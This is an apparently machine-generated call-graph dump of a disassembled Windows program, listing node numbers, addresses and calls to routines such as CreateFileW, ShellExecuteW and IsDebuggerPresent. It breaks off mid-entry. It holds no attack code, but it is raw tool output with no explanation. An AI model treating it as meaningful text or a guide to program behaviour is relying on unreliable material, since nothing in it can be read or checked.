103573->103574 103575 f4939e 103573->103575 103579 f49385 103574->103579 103580 f4942e 103574->103580 103590 f49403 103575->103590 103591 f493ec 103575->103591 103595 f491c5 __fread_nolock 103575->103595 103576->103575 103583 f4937f GetLastError 103576->103583 103639 f497a4 103577->103639 103637 f3f649 20 API calls __dosmaperr 103578->103637 103579->103595 103642 f3f613 20 API calls 2 library calls 103579->103642 103645 f3f649 20 API calls __dosmaperr 103580->103645 103583->103579 103584 f42d38 _free 20 API calls 103584->103545 103586 f49433 103646 f3f636 20 API calls __dosmaperr 103586->103646 103588 f49200 103638 f3f636 20 API calls __dosmaperr 103588->103638 103594 f4941a 103590->103594 103590->103595 103643 f48de1 31 API calls 3 library calls 103591->103643 103644 f48c21 29 API calls __fread_nolock 103594->103644 103595->103584 103597 f4941f 103597->103595 103598->103504 103599->103520 103600->103514 103601->103513 103602->103523 103603->103524 103604->103520 103605->103505 103606->103513 103607->103520 103609 f43bd1 103608->103609 103614 f43ba1 __dosmaperr 103608->103614 103651 f3f649 20 API calls __dosmaperr 103609->103651 103610 f43bbc RtlAllocateHeap 103612 f43bcf 103610->103612 103610->103614 103631 f42d38 103612->103631 103614->103609 103614->103610 103650 f3521d 7 API calls 2 library calls 103614->103650 103616 f4fc35 103615->103616 103617 f4fc28 103615->103617 103620 f4fc41 103616->103620 103653 f3f649 20 API calls __dosmaperr 103616->103653 103652 f3f649 20 API calls __dosmaperr 103617->103652 103619 f4fc2d 103619->103563 103620->103563 103622 f4fc62 103654 f42b5c 26 API calls __wsopen_s 103622->103654 103624->103538 103625->103545 103626->103548 103627->103546 103628->103557 103629->103564 103630->103595 103632 f42d6c _free 103631->103632 103633 f42d43 RtlFreeHeap 103631->103633 103632->103567 103633->103632 103634 f42d58 103633->103634 103655 f3f649 20 API calls __dosmaperr 103634->103655 103636 f42d5e GetLastError 103636->103632 103637->103588 103638->103595 103656 f4970b 103639->103656 103642->103595 103643->103595 103644->103597 103645->103586 103646->103595 103647->103541 103648->103546 103649->103545 103650->103614 103651->103612 103652->103619 103653->103622 103654->103619 103655->103636 103665 f45737 103656->103665 103658 f4971d 103659 f49725 103658->103659 103660 f49736 SetFilePointerEx 103658->103660 103678 f3f649 20 API calls __dosmaperr 103659->103678 103662 f4972a 103660->103662 103663 f4974e GetLastError 103660->103663 103662->103558 103679 f3f613 20 API calls 2 library calls 103663->103679 103666 f45744 103665->103666 103667 f45759 103665->103667 103680 f3f636 20 API calls __dosmaperr 103666->103680 103671 f4577e 103667->103671 103682 f3f636 20 API calls __dosmaperr 103667->103682 103670 f45749 103681 f3f649 20 API calls __dosmaperr 103670->103681 103671->103658 103672 f45789 103683 f3f649 20 API calls __dosmaperr 103672->103683 103674 f45751 103674->103658 103676 f45791 103684 f42b5c 26 API calls __wsopen_s 103676->103684 103678->103662 103679->103662 103680->103670 103681->103674 103682->103672 103683->103676 103684->103674 103685 f2235c 103694 f22365 __fread_nolock 103685->103694 103686 f18ec0 52 API calls 103686->103694 103687 f674e3 103697 f713c8 8 API calls __fread_nolock 103687->103697 103689 f674ef 103693 f1bed9 8 API calls 103689->103693 103695 f21ff7 __fread_nolock 103689->103695 103690 f223b6 103691 f17d74 8 API calls 103690->103691 103691->103695 103692 f3014b 8 API calls 103692->103694 103693->103695 103694->103686 103694->103687 103694->103690 103694->103692 103694->103695 103696 f3017b 8 API calls 103694->103696 103696->103694 103697->103689 103698 f1f4c0 103701 f2a025 103698->103701 103700 f1f4cc 103702 f2a046 103701->103702 103707 f2a0a3 103701->103707 103704 f20340 206 API calls 103702->103704 103702->103707 103708 f2a077 103704->103708 103705 f6806b 103705->103705 103706 f2a0e7 103706->103700 103707->103706 103710 f83fe1 81 API calls __wsopen_s 103707->103710 103708->103706 103708->103707 103709 f1bed9 8 API calls 103708->103709 103709->103707 103710->103705 103711 f61ac5 103712 f61acd 103711->103712 103715 f1d535 103711->103715 103742 f77a87 8 API calls __fread_nolock 103712->103742 103714 f61adf 103743 f77a00 8 API calls __fread_nolock 103714->103743 103718 f3014b 8 API calls 103715->103718 103717 f61b09 103719 f20340 206 API calls 103717->103719 103720 f1d589 103718->103720 103721 f61b30 103719->103721 103723 f1c32d 8 API calls 103720->103723 103722 f61b44 103721->103722 103744 f961a2 53 API calls _wcslen 103721->103744 103725 f1d5b3 103723->103725 103726 f3014b 8 API calls 103725->103726 103737 f1d66e ISource 103726->103737 103727 f61b61 103727->103715 103745 f77a87 8 API calls __fread_nolock 103727->103745 103729 f1c3ab 8 API calls 103739 f1d9ac ISource 103729->103739 103730 f1bed9 8 API calls 103730->103737 103733 f61f79 103747 f756ae 8 API calls ISource 103733->103747 103735 f61f94 103736 f1c3ab 8 API calls 103736->103737 103737->103730 103737->103733 103737->103735 103737->103736 103738 f1d911 ISource 103737->103738 103746 f1b4c8 8 API calls 103737->103746 103738->103729 103738->103739 103740 f1d9c3 103739->103740 103741 f2e30a 8 API calls ISource 103739->103741 103741->103739 103742->103714 103743->103717 103744->103727 103745->103727 103746->103737 103747->103735 103748 f1f5e5 103749 f1cab0 206 API calls 103748->103749 103750 f1f5f3 103749->103750 103751 f11044 103756 f12793 103751->103756 103753 f1104a 103792 f30413 29 API calls __onexit 103753->103792 103755 f11054 103793 f12a38 103756->103793 103760 f1280a 103761 f1bf73 8 API calls 103760->103761 103762 f12814 103761->103762 103763 f1bf73 8 API calls 103762->103763 103764 f1281e 103763->103764 103765 f1bf73 8 API calls 103764->103765 103766 f12828 103765->103766 103767 f1bf73 8 API calls 103766->103767 103768 f12866 103767->103768 103769 f1bf73 8 API calls 103768->103769 103770 f12932 103769->103770 103803 f12dbc 103770->103803 103774 f12964 103775 f1bf73 8 API calls 103774->103775 103776 f1296e 103775->103776 103777 f23160 9 API calls 103776->103777 103778 f12999 103777->103778 103830 f13166 103778->103830 103780 f129b5 103781 f129c5 GetStdHandle 103780->103781 103782 f539e7 103781->103782 103783 f12a1a 103781->103783 103782->103783 103784 f539f0 103782->103784 103786 f12a27 OleInitialize 103783->103786 103785 f3014b 8 API calls 103784->103785 103787 f539f7 103785->103787 103786->103753 103837 f80ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 103787->103837 103789 f53a00 103838 f812eb CreateThread 103789->103838 103791 f53a0c CloseHandle 103791->103783 103792->103755 103839 f12a91 103793->103839 103796 f12a91 8 API calls 103797 f12a70 103796->103797 103798 f1bf73 8 API calls 103797->103798 103799 f12a7c 103798->103799 103800 f18577 8 API calls 103799->103800 103801 f127c9 103800->103801 103802 f1327e 6 API calls 103801->103802 103802->103760 103804 f1bf73 8 API calls 103803->103804 103805 f12dcc 103804->103805 103806 f1bf73 8 API calls 103805->103806 103807 f12dd4 103806->103807 103846 f181d6 103807->103846 103810 f181d6 8 API calls 103811 f12de4 103810->103811 103812 f1bf73 8 API calls 103811->103812 103813 f12def 103812->103813 103814 f3014b 8 API calls 103813->103814 103815 f1293c 103814->103815 103816 f13205 103815->103816 103817 f13213 103816->103817 103818 f1bf73 8 API calls 103817->103818 103819 f1321e 103818->103819 103820 f1bf73 8 API calls 103819->103820 103821 f13229 103820->103821 103822 f1bf73 8 API calls 103821->103822 103823 f13234 103822->103823 103824 f1bf73 8 API calls 103823->103824 103825 f1323f 103824->103825 103826 f181d6 8 API calls 103825->103826 103827 f1324a 103826->103827 103828 f3014b 8 API calls 103827->103828 103829 f13251 RegisterWindowMessageW 103828->103829 103829->103774 103831 f13176 103830->103831 103832 f53c8f 103830->103832 103833 f3014b 8 API calls 103831->103833 103849 f83c4e 8 API calls 103832->103849 103836 f1317e 103833->103836 103835 f53c9a 103836->103780 103837->103789 103838->103791 103850 f812d1 14 API calls 103838->103850 103840 f1bf73 8 API calls 103839->103840 103841 f12a9c 103840->103841 103842 f1bf73 8 API calls 103841->103842 103843 f12aa4 103842->103843 103844 f1bf73 8 API calls 103843->103844 103845 f12a66 103844->103845 103845->103796 103847 f1bf73 8 API calls 103846->103847 103848 f12ddc 103847->103848 103848->103810 103849->103835 103851 f48782 103856 f4853e 103851->103856 103854 f487aa 103857 f4856f try_get_first_available_module 103856->103857 103864 f486b8 103857->103864 103871 f3917b 40 API calls 2 library calls 103857->103871 103859 f4876e 103875 f42b5c 26 API calls __wsopen_s 103859->103875 103861 f486c3 103861->103854 103868 f50d04 103861->103868 103863 f4870c 103863->103864 103872 f3917b 40 API calls 2 library calls 103863->103872 103864->103861 103874 f3f649 20 API calls __dosmaperr 103864->103874 103866 f4872b 103866->103864 103873 f3917b 40 API calls 2 library calls 103866->103873 103876 f50401 103868->103876 103870 f50d1f 103870->103854 103871->103863 103872->103866 103873->103864 103874->103859 103875->103861 103879 f5040d ___BuildCatchObject 103876->103879 103877 f5041b 103934 f3f649 20 API calls __dosmaperr 103877->103934 103879->103877 103881 f50454 103879->103881 103880 f50420 103935 f42b5c 26 API calls __wsopen_s 103880->103935 103887 f509db 103881->103887 103886 f5042a __wsopen_s 103886->103870 103937 f507af 103887->103937 103890 f50a26 103955 f45594 103890->103955 103891 f50a0d 103969 f3f636 20 API calls __dosmaperr 103891->103969 103894 f50a2b 103895 f50a34 103894->103895 103896 f50a4b 103894->103896 103971 f3f636 20 API calls __dosmaperr 103895->103971 103968 f5071a CreateFileW 103896->103968 103900 f50a39 103972 f3f649 20 API calls __dosmaperr 103900->103972 103902 f50b01 GetFileType 103904 f50b53 103902->103904 103905 f50b0c GetLastError 103902->103905 103903 f50478 103936 f504a1 LeaveCriticalSection __wsopen_s 103903->103936 103977 f454dd 21 API calls 3 library calls 103904->103977 103975 f3f613 20 API calls 2 library calls 103905->103975 103906 f50a12 103970 f3f649 20 API calls __dosmaperr 103906->103970 103907 f50ad6 GetLastError 103974 f3f613 20 API calls 2 library calls 103907->103974 103908 f50a84 103908->103902 103908->103907 103973 f5071a CreateFileW 103908->103973 103911 f50b1a CloseHandle 103911->103906 103913 f50b43 103911->103913 103976 f3f649 20 API calls __dosmaperr 103913->103976 103915 f50ac9 103915->103902 103915->103907 103917 f50b74 103919 f50bc0 103917->103919 103978 f5092b 72 API calls 4 library calls 103917->103978 103918 f50b48 103918->103906 103923 f50bed 103919->103923 103979 f504cd 72 API calls 4 library calls 103919->103979 103922 f50be6 103922->103923 103924 f50bfe 103922->103924 103980 f48a2e 103923->103980 103924->103903 103926 f50c7c CloseHandle 103924->103926 103995 f5071a CreateFileW 103926->103995 103928 f50ca7 103929 f50cb1 GetLastError 103928->103929 103930 f50cdd 103928->103930 103996 f3f613 20 API calls 2 library calls 103929->103996 103930->103903 103932 f50cbd 103997 f456a6 21 API calls 3 library calls 103932->103997 103934->103880 103935->103886 103936->103886 103938 f507d0 103937->103938 103943 f507ea 103937->103943 103938->103943 104005 f3f649 20 API calls __dosmaperr 103938->104005 103941 f507df 104006 f42b5c 26 API calls __wsopen_s 103941->104006 103998 f5073f 103943->103998 103944 f50822 103945 f50851 103944->103945 104007 f3f649 20 API calls __dosmaperr 103944->104007 103954 f508a4 103945->103954 104009 f3da7d 26 API calls 2 library calls 103945->104009 103948 f50846 104008 f42b5c 26 API calls __wsopen_s 103948->104008 103949 f5089f 103950 f5091e 103949->103950 103949->103954 104010 f42b6c 11 API calls _abort 103950->104010 103953 f5092a 103954->103890 103954->103891 103956 f455a0 ___BuildCatchObject 103955->103956 104013 f432d1 EnterCriticalSection 103956->104013 103958 f455a7 103959 f455cc 103958->103959 103964 f4563a EnterCriticalSection 103958->103964 103966 f455ee 103958->103966 104017 f45373 21 API calls 3 library calls 103959->104017 103962 f45617 __wsopen_s 103962->103894 103963 f455d1 103963->103966 104018 f454ba EnterCriticalSection 103963->104018 103965 f45647 LeaveCriticalSection 103964->103965 103964->103966 103965->103958 104014 f4569d 103966->104014 103968->103908 103969->103906 103970->103903 103971->103900 103972->103906 103973->103915 103974->103906 103975->103911 103976->103918 103977->103917 103978->103919 103979->103922 103981 f45737 __wsopen_s 26 API calls 103980->103981 103984 f48a3e 103981->103984 103982 f48a44 104020 f456a6 21 API calls 3 library calls 103982->104020 103984->103982 103985 f48a76 103984->103985 103987 f45737 __wsopen_s 26 API calls 103984->103987 103985->103982 103988 f45737 __wsopen_s 26 API calls 103985->103988 103986 f48a9c 103989 f48abe 103986->103989 104021 f3f613 20 API calls 2 library calls 103986->104021 103990 f48a6d 103987->103990 103991 f48a82 CloseHandle 103988->103991 103989->103903 103993 f45737 __wsopen_s 26 API calls 103990->103993 103991->103982 103994 f48a8e GetLastError 103991->103994 103993->103985 103994->103982 103995->103928 103996->103932 103997->103930 103999 f50757 103998->103999 104000 f50772 103999->104000 104011 f3f649 20 API calls __dosmaperr 103999->104011 104000->103944 104002 f50796 104012 f42b5c 26 API calls __wsopen_s 104002->104012 104004 f507a1 104004->103944 104005->103941 104006->103943 104007->103948 104008->103945 104009->103949 104010->103953 104011->104002 104012->104004 104013->103958 104019 f43319 LeaveCriticalSection 104014->104019 104016 f456a4 104016->103962 104017->103963 104018->103966 104019->104016 104020->103986 104021->103989 104022 f3076b 104023 f30777 ___BuildCatchObject 104022->104023 104052 f30221 104023->104052 104025 f3077e 104026 f308d1 104025->104026 104029 f307a8 104025->104029 104090 f30baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 104026->104090 104028 f308d8 104091 f351c2 28 API calls _abort 104028->104091 104031 f307e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 104029->104031 104063 f427ed 104029->104063 104039 f30848 104031->104039 104086 f3518a 38 API calls 3 library calls 104031->104086 104032 f308de 104092 f35174 28 API calls _abort 104032->104092 104036 f308e6 104037 f307c7 104071 f30cc9 104039->104071 104041 f3084e 104075 f1331b 104041->104075 104046 f3086a 104046->104028 104047 f3086e 104046->104047 104048 f30877 104047->104048 104088 f35165 28 API calls _abort 104047->104088 104089 f303b0 13 API calls 2 library calls 104048->104089 104051 f3087f 104051->104037 104053 f3022a 104052->104053 104093 f30a08 IsProcessorFeaturePresent 104053->104093 104055 f30236 104094 f33004 10 API calls 3 library calls 104055->104094 104057 f3023b 104058 f3023f 104057->104058 104095 f42687 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 104057->104095 104058->104025 104060 f30248 104061 f30256 104060->104061 104096 f3302d 8 API calls 3 library calls 104060->104096 104061->104025 104064 f42804 104063->104064 104097 f30dfc 104064->104097 104066 f307c1 104066->104037 104067 f42791 104066->104067 104068 f427c0 104067->104068 104069 f30dfc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 104068->104069 104070 f427e9 104069->104070 104070->104031 104105 f326b0 104071->104105 104074 f30cef 104074->104041 104076 f13327 IsThemeActive 104075->104076 104077 f13382 104075->104077 104107 f352b3 104076->104107 104087 f30d02 GetModuleHandleW 104077->104087 104079 f13352 104113 f35319 104079->104113 104081 f13359 104120 f132e6 SystemParametersInfoW SystemParametersInfoW 104081->104120 104083 f13360 104121 f1338b 104083->104121 104085 f13368 SystemParametersInfoW 104085->104077 104086->104039 104087->104046 104088->104048 104089->104051 104090->104028 104091->104032 104092->104036 104093->104055 104094->104057 104095->104060 104096->104058 104098 f30e07 IsProcessorFeaturePresent 104097->104098 104099 f30e05 104097->104099 104101 f30fce 104098->104101 104099->104066 104104 f30f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 104101->104104 104103 f310b1 104103->104066 104104->104103 104106 f30cdc GetStartupInfoW 104105->104106 104106->104074 104108 f352bf ___BuildCatchObject 104107->104108 104170 f432d1 EnterCriticalSection 104108->104170 104110 f352ca pre_c_initialization 104171 f3530a 104110->104171 104112 f352ff __wsopen_s 104112->104079 104114 f35325 104113->104114 104115 f3533f 104113->104115 104114->104115 104175 f3f649 20 API calls __dosmaperr 104114->104175 104115->104081 104117 f3532f 104176 f42b5c 26 API calls __wsopen_s 104117->104176 104119 f3533a 104119->104081 104120->104083 104122 f1339b __wsopen_s 104121->104122 104123 f1bf73 8 API calls 104122->104123 104124 f133a7 GetCurrentDirectoryW 104123->104124 104177 f14fd9 104124->104177 104126 f133ce IsDebuggerPresent 104127 f53ca3 MessageBoxA 104126->104127 104128 f133dc 104126->104128 104130 f53cbb 104127->104130 104129 f133f0 104128->104129 104128->104130 104245 f13a95 104129->104245 104281 f14176 8 API calls 104130->104281 104137 f13462 104139 f53cec SetCurrentDirectoryW 104137->104139 104140 f1346a 104137->104140 104139->104140 104141 f13475 104140->104141 104282 f71fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 104140->104282 104277 f134d3 7 API calls 104141->104277 104144 f53d07 104144->104141 104147 f53d19 104144->104147 104149 f15594 10 API calls 104147->104149 104148 f1347f 104151 f1396b 60 API calls 104148->104151 104152 f13494 104148->104152 104150 f53d22 104149->104150 104153 f1b329 8 API calls 104150->104153 104151->104152 104154 f134af 104152->104154 104156 f13907 Shell_NotifyIconW 104152->104156 104155 f53d30 104153->104155 104159 f134b6 SetCurrentDirectoryW 104154->104159 104157 f53d5f 104155->104157 104158 f53d38 104155->104158 104156->104154 104160 f16b7c 8 API calls 104157->104160 104161 f16b7c 8 API calls 104158->104161 104162 f134ca 104159->104162 104163 f53d5b GetForegroundWindow ShellExecuteW 104160->104163 104164 f53d43 104161->104164 104162->104085 104168 f53d90 104163->104168 104165 f17bb5 8 API calls 104164->104165 104167 f53d51 104165->104167 104169 f16b7c 8 API calls 104167->104169 104168->104154 104169->104163 104170->104110 104174 f43319 LeaveCriticalSection 104171->104174 104173 f35311 104173->104112 104174->104173 104175->104117 104176->104119 104178 f1bf73 8 API calls 104177->104178 104179 f14fef 104178->104179 104283 f163d7 104179->104283 104181 f1500d 104182 f1bd57 8 API calls 104181->104182 104183 f15021 104182->104183 104184 f1bed9 8 API calls 104183->104184 104185 f1502c 104184->104185 104186 f1893c 8 API calls 104185->104186 104187 f15038 104186->104187 104188 f1b329 8 API calls 104187->104188 104189 f15045 104188->104189 104190 f1be2d 39 API calls 104189->104190 104191 f15055 104190->104191 104192 f1b329 8 API calls 104191->104192 104193 f1507b 104192->104193 104194 f1be2d 39 API calls 104193->104194 104195 f1508a 104194->104195 104196 f1bf73 8 API calls 104195->104196 104197 f150a8 104196->104197 104297 f151ca 104197->104297 104200 f34d98 _strftime 40 API calls 104201 f150c2 104200->104201 104202 f54b23 104201->104202 104203 f150cc 104201->104203 104205 f151ca 8 API calls 104202->104205 104204 f34d98 _strftime 40 API calls 104203->104204 104207 f150d7 104204->104207 104206 f54b37 104205->104206 104209 f151ca 8 API calls 104206->104209 104207->104206 104208 f150e1 104207->104208 104210 f34d98 _strftime 40 API calls 104208->104210 104211 f54b53 104209->104211 104212 f150ec 104210->104212 104214 f15594 10 API calls 104211->104214 104212->104211 104213 f150f6 104212->104213 104215 f34d98 _strftime 40 API calls 104213->104215 104216 f54b76 104214->104216 104217 f15101 104215->104217 104218 f151ca 8 API calls 104216->104218 104219 f54b9f 104217->104219 104220 f1510b 104217->104220 104223 f54b82 104218->104223 104222 f151ca 8 API calls 104219->104222 104221 f1512e 104220->104221 104224 f1bed9 8 API calls 104220->104224 104226 f54bda 104221->104226 104230 f17e12 8 API calls 104221->104230 104225 f54bbd 104222->104225 104227 f1bed9 8 API calls 104223->104227 104228 f15121 104224->104228 104229 f1bed9 8 API calls 104225->104229 104231 f54b90 104227->104231 104232 f151ca 8 API calls 104228->104232 104233 f54bcb 104229->104233 104234 f1513e 104230->104234 104235 f151ca 8 API calls 104231->104235 104232->104221 104236 f151ca 8 API calls 104233->104236 104237 f18470 8 API calls 104234->104237 104235->104219 104236->104226 104238 f1514c 104237->104238 104239 f18a60 8 API calls 104238->104239 104242 f15167 104239->104242 104240 f1893c 8 API calls 104240->104242 104241 f18a60 8 API calls 104241->104242 104242->104240 104242->104241 104243 f151ab 104242->104243 104244 f151ca 8 API calls 104242->104244 104243->104126 104244->104242 104246 f13aa2 __wsopen_s 104245->104246 104247 f13abb 104246->104247 104248 f540da ___scrt_fastfail 104246->104248 104249 f15851 9 API calls 104247->104249 104250 f540f6 GetOpenFileNameW 104248->104250 104251 f13ac4 104249->104251 104252 f54145 104250->104252 104303 f13a57 104251->104303 104254 f18577 8 API calls 104252->104254 104256 f5415a 104254->104256 104256->104256 104258 f13ad9 104321 f162d5 104258->104321 104868 f13624 7 API calls 104277->104868 104279 f1347a 104280 f135b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104279->104280 104280->104148 104281->104137 104282->104144 104284 f163e4 __wsopen_s 104283->104284 104285 f18577 8 API calls 104284->104285 104286 f16416 104284->104286 104285->104286 104287 f1655e 8 API calls 104286->104287 104292 f1644c 104286->104292 104287->104286 104288 f1b329 8 API calls 104289 f16543 104288->104289 104291 f16a7c 8 API calls 104289->104291 104290 f1b329 8 API calls 104290->104292 104294 f1654f 104291->104294 104292->104290 104293 f1655e 8 API calls 104292->104293 104295 f16a7c 8 API calls 104292->104295 104296 f1651a 104292->104296 104293->104292 104294->104181 104295->104292 104296->104288 104296->104294 104298 f151f2 104297->104298 104299 f151d4 104297->104299 104300 f18577 8 API calls 104298->104300 104301 f1bed9 8 API calls 104299->104301 104302 f150b4 104299->104302 104300->104302 104301->104302 104302->104200 104304 f522d0 __wsopen_s 104303->104304 104305 f13a64 GetLongPathNameW 104304->104305 104306 f18577 8 API calls 104305->104306 104307 f13a8c 104306->104307 104308 f153f2 104307->104308 104309 f1bf73 8 API calls 104308->104309 104310 f15404 104309->104310 104311 f15851 9 API calls 104310->104311 104312 f1540f 104311->104312 104313 f1541a 104312->104313 104317 f54d5b 104312->104317 104314 f16a7c 8 API calls 104313->104314 104316 f15426 104314->104316 104351 f11340 104316->104351 104319 f54d7d 104317->104319 104357 f2e36b 41 API calls 104317->104357 104320 f15439 104320->104258 104358 f16679 104321->104358 104324 f55336 104483 f836b8 104324->104483 104326 f16679 93 API calls 104327 f1630e 104326->104327 104327->104324 104329 f16316 104327->104329 104332 f16322 104329->104332 104333 f55353 104329->104333 104330 f55368 104380 f13b39 104332->104380 104534 f7e30e 82 API calls 104333->104534 104339 f55361 104339->104330 104352 f11352 104351->104352 104356 f11371 __fread_nolock 104351->104356 104354 f3017b 8 API calls 104352->104354 104353 f3014b 8 API calls 104355 f11388 104353->104355 104354->104356 104355->104320 104356->104353 104357->104317 104537 f1663e LoadLibraryA 104358->104537 104363 f166a4 LoadLibraryExW 104545 f16607 LoadLibraryA 104363->104545 104364 f55648 104365 f166e7 68 API calls 104364->104365 104367 f5564f 104365->104367 104369 f16607 3 API calls 104367->104369 104371 f55657 104369->104371 104566 f1684a 104371->104566 104372 f166ce 104372->104371 104373 f166da 104372->104373 104375 f166e7 68 API calls 104373->104375 104377 f162fa 104375->104377 104377->104324 104377->104326 104381 f13b62 104380->104381 104382 f5415f 104380->104382 104384 f3017b 8 API calls 104381->104384 104484 f836d4 104483->104484 104485 f16874 64 API calls 104484->104485 104486 f836e8 104485->104486 104766 f83827 104486->104766 104534->104339 104538 f16674 104537->104538 104539 f16656 GetProcAddress 104537->104539 104542 f3e95b 104538->104542 104540 f16666 104539->104540 104540->104538 104541 f1666d FreeLibrary 104540->104541 104541->104538 104574 f3e89a 104542->104574 104544 f16698 104544->104363 104544->104364 104546 f1663b 104545->104546 104547 f1661c GetProcAddress 104545->104547 104550 f16720 104546->104550 104548 f1662c 104547->104548 104548->104546 104549 f16634 FreeLibrary 104548->104549 104549->104546 104551 f3017b 8 API calls 104550->104551 104552 f16735 104551->104552 104553 f1423c 8 API calls 104552->104553 104555 f16741 __fread_nolock 104553->104555 104554 f556c2 104634 f83a92 74 API calls 104554->104634 104555->104554 104559 f1677c 104555->104559 104633 f83a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 104555->104633 104558 f1684a 40 API calls 104558->104559 104559->104558 104560 f55706 104559->104560 104561 f16874 64 API calls 104559->104561 104563 f16810 ISource 104559->104563 104628 f16874 104560->104628 104561->104559 104563->104372 104567 f55760 104566->104567 104568 f1685c 104566->104568 104666 f3ec34 104568->104666 104571 f832bd 104703 f8310d 104571->104703 104573 f832d8 104577 f3e8a6 ___BuildCatchObject 104574->104577 104575 f3e8b4 104599 f3f649 20 API calls __dosmaperr 104575->104599 104577->104575 104579 f3e8e4 104577->104579 104578 f3e8b9 104600 f42b5c 26 API calls __wsopen_s 104578->104600 104581 f3e8f6 104579->104581 104582 f3e8e9 104579->104582 104591 f483e1 104581->104591 104601 f3f649 20 API calls __dosmaperr 104582->104601 104585 f3e8ff 104587 f3e912 104585->104587 104588 f3e905 104585->104588 104586 f3e8c4 __wsopen_s 104586->104544 104603 f3e944 LeaveCriticalSection __fread_nolock 104587->104603 104602 f3f649 20 API calls __dosmaperr 104588->104602 104592 f483ed ___BuildCatchObject 104591->104592 104604 f432d1 EnterCriticalSection 104592->104604 104594 f483fb 104605 f4847b 104594->104605 104598 f4842c __wsopen_s 104598->104585 104599->104578 104600->104586 104601->104586 104602->104586 104603->104586 104604->104594 104606 f4849e 104605->104606 104607 f484f7 104606->104607 104614 f48408 104606->104614 104622 f394fd EnterCriticalSection 104606->104622 104623 f39511 LeaveCriticalSection 104606->104623 104624 f44ff0 20 API calls 2 library calls 104607->104624 104609 f48500 104611 f42d38 _free 20 API calls 104609->104611 104612 f48509 104611->104612 104612->104614 104625 f43778 11 API calls 2 library calls 104612->104625 104619 f48437 104614->104619 104615 f48528 104626 f394fd EnterCriticalSection 104615->104626 104618 f4853b 104618->104614 104627 f43319 LeaveCriticalSection 104619->104627 104621 f4843e 104621->104598 104622->104606 104623->104606 104624->104609 104625->104615 104626->104618 104627->104621 104629 f16883 104628->104629 104630 f55780 104628->104630 104635 f3f053 104629->104635 104633->104554 104634->104559 104638 f3ee1a 104635->104638 104637 f16891 104642 f3ee26 ___BuildCatchObject 104638->104642 104639 f3ee32 104663 f3f649 20 API calls __dosmaperr 104639->104663 104641 f3ee58 104651 f394fd EnterCriticalSection 104641->104651 104642->104639 104642->104641 104643 f3ee37 104664 f42b5c 26 API calls __wsopen_s 104643->104664 104646 f3ee64 104652 f3ef7a 104646->104652 104650 f3ee42 __wsopen_s 104650->104637 104651->104646 104653 f3ef9c 104652->104653 104654 f3ef8c 104652->104654 104656 f3eea1 28 API calls 104653->104656 104655 f3f649 _free 20 API calls 104654->104655 104663->104643 104664->104650 104669 f3ec51 104666->104669 104668 f1686d 104668->104571 104670 f3ec5d ___BuildCatchObject 104669->104670 104671 f3ec70 ___scrt_fastfail 104670->104671 104672 f3ec9d 104670->104672 104673 f3ec95 __wsopen_s 104670->104673 104696 f3f649 20 API calls __dosmaperr 104671->104696 104682 f394fd EnterCriticalSection 104672->104682 104673->104668 104676 f3eca7 104683 f3ea68 104676->104683 104677 f3ec8a 104697 f42b5c 26 API calls __wsopen_s 104677->104697 104682->104676 104685 f3ea7a ___scrt_fastfail 104683->104685 104689 f3ea97 104683->104689 104684 f3ea87 104699 f3f649 20 API calls __dosmaperr 104684->104699 104685->104684 104685->104689 104691 f3eada __fread_nolock 104685->104691 104687 f3ea8c 104700 f42b5c 26 API calls __wsopen_s 104687->104700 104698 f3ecdc LeaveCriticalSection __fread_nolock 104689->104698 104690 f3ebf6 ___scrt_fastfail 104702 f3f649 20 API calls __dosmaperr 104690->104702 104691->104689 104691->104690 104693 f3dcc5 __fread_nolock 26 API calls 104691->104693 104695 f490c5 __fread_nolock 38 API calls 104691->104695 104701 f3d2e8 26 API calls 4 library calls 104691->104701 104693->104691 104695->104691 104696->104677 104697->104673 104698->104673 104699->104687 104700->104689 104701->104691 104702->104687 104706 f3e858 104703->104706 104705 f8311c 104705->104573 104709 f3e7d9 104706->104709 104708 f3e875 104708->104705 104710 f3e7e8 104709->104710 104711 f3e7fc 104709->104711 104717 f3f649 20 API calls __dosmaperr 104710->104717 104715 f3e7f8 __alldvrm 104711->104715 104719 f436b2 11 API calls 2 library calls 104711->104719 104713 f3e7ed 104718 f42b5c 26 API calls __wsopen_s 104713->104718 104715->104708 104717->104713 104718->104715 104719->104715 104770 f8383b 104766->104770 104868->104279 104869 f6400f 104875 f1eeb0 ISource 104869->104875 104870 f1f0d5 104871 f1f211 PeekMessageW 104871->104875 104872 f1ef07 GetInputState 104872->104871 104872->104875 104874 f632cd TranslateAcceleratorW 104874->104875 104875->104870 104875->104871 104875->104872 104875->104874 104876 f1f28f PeekMessageW 104875->104876 104877 f1f104 timeGetTime 104875->104877 104878 f1f273 TranslateMessage DispatchMessageW 104875->104878 104879 f1f2af Sleep 104875->104879 104880 f64183 Sleep 104875->104880 104881 f633e9 timeGetTime 104875->104881 104896 f20340 206 API calls 104875->104896 104899 f22b20 206 API calls 104875->104899 104901 f1f450 104875->104901 104908 f1f6d0 104875->104908 104931 f2e915 104875->104931 104937 f8446f 8 API calls 104875->104937 104938 f83fe1 81 API calls __wsopen_s 104875->104938 104876->104875 104877->104875 104878->104876 104898 f1f2c0 104879->104898 104880->104898 104936 f2aa65 9 API calls 104881->104936 104882 f2f215 timeGetTime 104882->104898 104883 f7dd87 46 API calls 104883->104898 104885 f6421a GetExitCodeProcess 104887 f64246 CloseHandle 104885->104887 104888 f64230 WaitForSingleObject 104885->104888 104886 f63d51 104891 f63d59 104886->104891 104887->104898 104888->104875 104888->104887 104889 fa345b GetForegroundWindow 104889->104898 104892 f642b8 Sleep 104892->104875 104896->104875 104898->104875 104898->104882 104898->104883 104898->104885 104898->104886 104898->104889 104898->104892 104939 f960b5 8 API calls 104898->104939 104940 f7f292 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104898->104940 104899->104875 104902 f1f483 104901->104902 104903 f1f46f 104901->104903 104973 f83fe1 81 API calls 